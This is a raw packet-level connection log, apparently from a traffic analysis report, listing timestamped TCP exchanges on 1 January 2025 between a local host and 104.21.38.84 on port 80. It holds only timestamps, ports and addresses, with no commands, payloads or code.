                                                                                                                          Jan 1, 2025 04:24:50.984431028 CET8050235104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:51.335607052 CET5023580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:51.340507030 CET8050235104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:51.442358971 CET8050235104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:51.490592003 CET5023580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:51.719597101 CET8050235104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:51.771842003 CET5023580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:51.850116014 CET5023680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:51.855071068 CET8050236104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:51.855137110 CET5023680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:51.855257034 CET5023680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:51.860029936 CET8050236104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:52.209408045 CET5023680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:52.214351892 CET8050236104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:52.308496952 CET8050236104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:52.349978924 CET5023680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:52.492577076 CET8050236104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:52.537559986 CET5023680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:52.613050938 CET5023680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:52.613760948 CET5023780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:52.618128061 CET8050236104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:52.618676901 CET8050237104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:52.618700981 CET5023680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:52.623616934 CET5023780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:52.635548115 CET5023780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:52.642775059 CET8050237104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:52.991628885 CET5023780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:52.996566057 CET8050237104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:53.087493896 CET8050237104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:53.131239891 CET5023780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:53.263952971 CET8050237104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:53.319607973 CET5023780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:53.396101952 CET5023780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:53.396780014 CET5023880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:53.401253939 CET8050237104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:53.401299000 CET5023780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:53.401649952 CET8050238104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:53.401701927 CET5023880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:53.401865005 CET5023880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:53.406675100 CET8050238104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:53.756320000 CET5023880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:53.761286974 CET8050238104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:53.845489025 CET8050238104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:53.896842003 CET5023880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:54.020726919 CET8050238104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:54.068738937 CET5023880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:54.139677048 CET5023580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:54.142167091 CET5023880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:54.142838001 CET5023980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:54.147825956 CET8050238104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:54.147890091 CET5023880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:54.148248911 CET8050239104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:54.148317099 CET5023980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:54.148426056 CET5023980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:54.153846025 CET8050239104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:54.507633924 CET5023980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:54.512695074 CET8050239104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:54.621336937 CET8050239104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:54.679619074 CET5023980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:54.773127079 CET5023980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:54.773127079 CET5024080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:54.779232025 CET8050240104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:54.779354095 CET8050239104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:54.779452085 CET5023980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:54.779452085 CET5024080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:54.779594898 CET5024080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:54.785157919 CET8050240104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:54.899499893 CET5024180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:54.905446053 CET8050241104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:54.907731056 CET5024180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:54.907731056 CET5024180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:54.913556099 CET8050241104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:55.131635904 CET5024080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:55.136588097 CET8050240104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:55.136733055 CET8050240104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:55.253520012 CET8050240104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:55.259615898 CET5024180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:55.264513969 CET8050241104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:55.303122997 CET5024080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:55.353085041 CET8050241104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:55.397054911 CET5024180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:55.427705050 CET8050240104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:55.474982023 CET5024080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:55.608402967 CET8050241104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:55.662467957 CET5024180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:55.725146055 CET5024080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:55.725258112 CET5024180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:55.725912094 CET5024280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:55.730348110 CET8050240104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:55.730397940 CET5024080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:55.730573893 CET8050241104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:55.730612993 CET5024180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:55.730696917 CET8050242104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:55.730748892 CET5024280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:55.730894089 CET5024280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:55.735670090 CET8050242104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:56.084458113 CET5024280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:56.089478016 CET8050242104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:56.204227924 CET8050242104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:56.256227970 CET5024280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:56.463289022 CET8050242104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:56.467613935 CET5024280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:56.472594976 CET8050242104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:56.479614973 CET5024280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:56.580115080 CET5024380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:56.585275888 CET8050243104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:56.587713957 CET5024380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:56.587868929 CET5024380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:56.592689037 CET8050243104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:56.944083929 CET5024380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:56.949088097 CET8050243104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:57.034864902 CET8050243104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:57.084418058 CET5024380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:57.288726091 CET8050243104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:57.335613012 CET5024380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:57.401352882 CET5020380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:57.414074898 CET5024380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:57.414521933 CET5024480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:57.419079065 CET8050243104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:57.419116974 CET5024380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:57.419370890 CET8050244104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:57.419504881 CET5024480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:57.419565916 CET5024480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:57.424314022 CET8050244104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:57.771936893 CET5024480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:57.776925087 CET8050244104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:57.879018068 CET8050244104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:57.928101063 CET5024480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:58.127417088 CET8050244104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:58.178097963 CET5024480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:58.254049063 CET5024480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:58.254697084 CET5024580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:58.259129047 CET8050244104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:58.259176016 CET5024480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:58.259510994 CET8050245104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:58.259573936 CET5024580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:58.259677887 CET5024580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:58.264420033 CET8050245104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:58.615772963 CET5024580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:58.620767117 CET8050245104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:58.713011026 CET8050245104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:58.759613037 CET5024580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:58.986325979 CET8050245104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:59.039629936 CET5024580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:59.111619949 CET5024680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:59.111623049 CET5024580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:59.116548061 CET8050246104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:59.116630077 CET8050245104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:59.116720915 CET5024580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:59.116733074 CET5024680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:59.116945028 CET5024680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:59.121767998 CET8050246104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:59.475053072 CET5024680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:59.479988098 CET8050246104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:59.560724974 CET8050246104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:59.615608931 CET5024680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:59.729034901 CET8050246104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:59.771852970 CET5024680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:59.849767923 CET5024680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:59.850704908 CET5024780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:59.854881048 CET8050246104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:59.854923964 CET5024680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:59.855509043 CET8050247104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:59.855565071 CET5024780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:59.855664015 CET5024780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:59.860455036 CET8050247104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:00.209460020 CET5024780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:00.214406967 CET8050247104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:00.327749968 CET8050247104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:00.383614063 CET5024780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:00.445231915 CET5024880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:00.445547104 CET5024780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:00.450123072 CET8050248104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:00.450541019 CET8050247104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:00.450643063 CET5024880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:00.450644970 CET5024780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:00.450855970 CET5024880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:00.455707073 CET8050248104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:00.583622932 CET5024980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:00.588505983 CET8050249104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:00.588984966 CET5024980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:00.589092016 CET5024980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:00.593904018 CET8050249104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:00.803632975 CET5024880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:00.808536053 CET8050248104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:00.808557987 CET8050248104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:00.899817944 CET8050248104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:00.943888903 CET5024980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:00.948827982 CET8050249104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:00.959369898 CET5024880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:01.034497976 CET8050249104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:01.084372044 CET5024980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:01.176173925 CET8050248104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:01.227617979 CET5024880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:01.290322065 CET8050249104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:01.335649967 CET5024980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:01.426345110 CET5024880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:01.426409960 CET5024980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:01.427335024 CET5025080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:01.431355953 CET8050248104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:01.431397915 CET5024880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:01.431577921 CET8050249104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:01.431652069 CET5024980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:01.432076931 CET8050250104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:01.432136059 CET5025080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:01.432317972 CET5025080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:01.437118053 CET8050250104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:01.787693977 CET5025080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:01.792665958 CET8050250104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:01.876935005 CET8050250104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:01.928106070 CET5025080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:02.055809975 CET8050250104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:02.099991083 CET5025080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:02.172322989 CET5025080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:02.173007965 CET5025180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:02.177645922 CET8050250104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:02.177803040 CET5025080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:02.178010941 CET8050251104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:02.178097963 CET5025180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:02.178193092 CET5025180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:02.183466911 CET8050251104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:02.538109064 CET5025180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:02.543102980 CET8050251104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:02.626599073 CET8050251104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:02.678184986 CET5025180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:02.806111097 CET8050251104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:02.850162983 CET5025180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:03.110627890 CET5025280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:03.115526915 CET8050252104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:03.117141962 CET5025280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:03.126024961 CET5025280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:03.131057978 CET8050252104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:03.475503922 CET5025280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:03.480562925 CET8050252104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:03.565201998 CET8050252104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:03.615612984 CET5025280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:03.832325935 CET8050252104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:03.881262064 CET5025280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:03.963296890 CET5025280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:03.964083910 CET5025380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:03.968502998 CET8050252104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:03.968549967 CET5025280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:03.968929052 CET8050253104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:03.968995094 CET5025380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:03.969141006 CET5025380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:03.973953009 CET8050253104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:04.318811893 CET5025380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:04.323736906 CET8050253104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:04.423285961 CET8050253104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:04.475001097 CET5025380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:04.701864958 CET8050253104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:04.813832045 CET5025380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:04.814488888 CET5025480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:04.818917990 CET8050253104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:04.819277048 CET8050254104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:04.819366932 CET5025480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:04.819370985 CET5025380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:04.819680929 CET5025480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:04.824470043 CET8050254104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:05.181807995 CET5025480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:05.186705112 CET8050254104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:05.273629904 CET8050254104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:05.386080027 CET5025480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:05.539211988 CET8050254104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:05.589804888 CET5025480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:05.663417101 CET5025480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:05.664226055 CET5025580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:05.669265985 CET8050254104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:05.669363022 CET5025480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:05.670053005 CET8050255104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:05.670109034 CET5025580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:05.670233011 CET5025580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:05.675848007 CET8050255104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:06.021987915 CET5025580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:06.027232885 CET8050255104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:06.143388033 CET8050255104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:06.193748951 CET5025580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:06.196089983 CET5025680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:06.196547031 CET5025580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:06.200937986 CET8050256104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:06.200992107 CET5025680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:06.201080084 CET5025680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:06.201546907 CET8050255104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:06.201592922 CET5025580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:06.205905914 CET8050256104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:06.317421913 CET5025780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:06.322365046 CET8050257104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:06.322417974 CET5025780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:06.322523117 CET5025780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:06.327353954 CET8050257104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:06.553699970 CET5025680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:06.558607101 CET8050256104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:06.558650970 CET8050256104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:06.654678106 CET8050256104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:06.678332090 CET5025780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:06.683240891 CET8050257104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:06.709700108 CET5025680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:06.767608881 CET8050257104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:06.818751097 CET5025780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:06.844371080 CET8050256104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:06.898082018 CET5025680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:07.210793972 CET8050257104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:07.210807085 CET8050257104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:07.210817099 CET8050257104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:07.213888884 CET5025780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:07.329787016 CET5025780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:07.329852104 CET5025680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:07.330182076 CET5025880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:07.334892035 CET8050257104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:07.334995031 CET8050258104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:25:07.335089922 CET5025780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:25:07.335114956 CET5025880192.168.2.4104.21.38.84
